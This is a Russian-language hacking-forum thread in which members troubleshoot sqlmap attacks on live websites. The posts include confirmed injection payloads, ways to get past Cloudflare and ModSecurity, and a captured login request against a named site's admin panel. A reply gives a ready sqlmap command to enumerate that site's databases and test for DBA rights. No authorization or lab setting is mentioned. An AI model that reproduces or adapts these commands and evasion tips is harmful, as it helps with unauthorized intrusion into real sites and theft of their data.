Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Xsite

    Xsite New Member

    Joined:
    21 Jan 2010
    Messages:
    40
    Likes Received:
    4
    Reputations:
    0
    Подскажите есть решение траблы с клаудом? как я понимаю не крутится из-за него

    [12:11:45] [WARNING] potential browser verification protection mechanism detected (CloudFlare)
    [12:11:45] [WARNING] the web server responded with an HTTP error code (503) which could interfere with the results of the tests
     
  2. dmax0fw

    dmax0fw Member

    Joined:
    31 Dec 2017
    Messages:
    49
    Likes Received:
    25
    Reputations:
    0
    попробуй вручную пройти верификацию в браузере, cloudflare присвоит тебе куки, затем передай эти куки в sqlmap
     
  3. ekaterina333

    ekaterina333 New Member

    Joined:
    11 Oct 2013
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    не поможет думаю там в другом проблема
     
  4. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    79
    Likes Received:
    3
    Reputations:
    0
    попробуй узнать реальный ip и его уже дергать. https://forum.antichat.ru/threads/realnyj-ip-za-cloud-flare-sokrytie-i-poisk.458593/
     
  5. Xsite

    Xsite New Member

    Joined:
    21 Jan 2010
    Messages:
    40
    Likes Received:
    4
    Reputations:
    0
  6. Golfstream

    Golfstream New Member

    Joined:
    16 Mar 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    [22:12:44] [WARNING] the web server responded with an HTTP error code (424) whic
    h could interfere with the results of the tests
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: vote (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: wp-polls-nonce=08fc675d54&vote=-6688) OR 8053=8053-- GHAp&poll_3=8&
    poll_3=9&poll_3=10&archive-dropdown=http://*****.**/2014/05/&poll_id=3
    ---
    [22:12:44] [INFO] the back-end DBMS is Microsoft SQL Server
    back-end DBMS: Microsoft SQL Server 2016
    [22:12:44] [INFO] fetching database names
    [22:12:44] [INFO] fetching number of databases
    [22:12:46] [INFO] retrieved:
    [22:12:46] [ERROR] unable to retrieve the number of databases
    [22:12:46] [INFO] retrieving the length of query output
    [22:12:46] [INFO] retrieved:
    [22:12:47] [INFO] retrieved:
    [22:12:47] [INFO] falling back to current database
    [22:12:47] [INFO] fetching current database
    [22:12:47] [INFO] retrieving the length of query output
    [22:12:47] [INFO] retrieved:
    [22:12:48] [INFO] retrieved:
    [22:12:48] [CRITICAL] unable to retrieve the database names
    [22:12:48] [WARNING] HTTP error codes detected during run:
    424 (?) - 24 times

    подскажите дальнейшие действия, может команды какойто не хватает? блокируется бд. Тамперы юзал, но толка нет
     
    #606 Golfstream, 27 Jan 2018
    Last edited: 27 Jan 2018
  7. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    49
    Likes Received:
    29
    Reputations:
    2
    Включи -v 3 и --parse-errors, там смотри откуда ноги растут. Еще попробуй --no-cast или --hex, иногда прокатывает. Зачарить пробуй.
     
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    283
    Likes Received:
    17
    Reputations:
    0
    Нашёл слепую SQL injection на сайте но она в профиле аккаунта
    Как мне прикрутить сесию или типа того ?
     
  9. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    829
    Likes Received:
    1,013
    Reputations:
    69
    куки задать не пробовал ? --cookie=".........."
     
  10. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    283
    Likes Received:
    17
    Reputations:
    0
    нет, но ща попробую
     
  11. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    283
    Likes Received:
    17
    Reputations:
    0
    Code:
    sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
    ---
    Parameter: industry (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: industry=-5813 OR 1546=1546
        Vector: OR [INFERENCE]
    базы не показало
    и так же высветилась ошибка
    Code:
    [00:24:05] [CRITICAL] sqlmap was not able to fingerprint the back-end database management system
     
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    283
    Likes Received:
    17
    Reputations:
    0
    Так по ошибки он не понял вид BD у меня в приоретете стояла MySQL
    я удалил преоритет сейчас глану ещё раз
     
  13. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,868
    Likes Received:
    7,087
    Reputations:
    100
    да, держи нас в курсе
     
    ShpillyWilly and joelblack like this.
  14. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    283
    Likes Received:
    17
    Reputations:
    0
    ок :D
     
  15. The404

    The404 New Member

    Joined:
    9 Oct 2016
    Messages:
    6
    Likes Received:
    3
    Reputations:
    0
    Всем привет!
    Acunetix находит boolean-based blind

    POST /admin/admin.php HTTP/1.1
    Content-Length: 195
    Content-Type: application/x-www-form-urlencoded
    X-Requested-With: XMLHttpRequest
    Referer: http://dsm-print.ru/
    Cookie: SNS=8q3t6fosp0qb982nlqjkb8i3o2; PHPSESSID=2u4rtf0pji3cfe4bou3tnra5n7; _ym_uid=1518504918276952455;
    _ym_isad=2; _ym_visorc_44242969=w
    Host: dsm-print.ru
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0
    Safari/537.21
    Accept: */*
    enter_admin=%c2%ee%e9%f2%e8&admin_name=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))
    OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&admin_password=g00dPa%24%24w0rD

    помогите правильно составить запрос sqlmap и раскрутить эту шнягу - что не делаю modsecurity выдает - Error 415 Unsupported Media type
    заранее благодарю....
     
  16. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    829
    Likes Received:
    1,013
    Reputations:
    69
    Не хорошо по ру работать



    sqlmap --random-agent -u 'http://dsm-print.ru/admin/admin.php' --data='enter_admin=&admin_name=*&admin_password=' --dbs --is-dba
    ______________________________________________________________________
    На счёт мод сека, тут надо уже ручками крутить ))
     
  17. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,868
    Likes Received:
    7,087
    Reputations:
    100
    угу)
    Мирослав же вроде пилил modsecurityzeroversioned.py, не?
     
  18. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,868
    Likes Received:
    7,087
    Reputations:
    100
    тож не знаю... то я загуглил.
    Просто тема как бэ за его продукт - вот я и отписался, для тех пацанов, кто не в курсе!)
     
  19. The404

    The404 New Member

    Joined:
    9 Oct 2016
    Messages:
    6
    Likes Received:
    3
    Reputations:
    0
    По RU -да не вреда ради - просто очень инфа нужна - тото я гляжу сдесь половина ветки RU скулями забита....
    Запрос не помог - а так если что - извиняюсь...
     
  20. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    283
    Likes Received:
    17
    Reputations:
    0
    Не как не могу раскрутить и за этого убогого WAF
    Code:
    [04:59:22] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests
    [04:59:22] [WARNING] HTTP error codes detected during run:
    400 (Bad Request) - 430 times, 414 (Request-URI Too Long) - 639 times
    [04:59:22] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some kind of protection is involved (e.g. WAF)
    Помогите
     
Loading...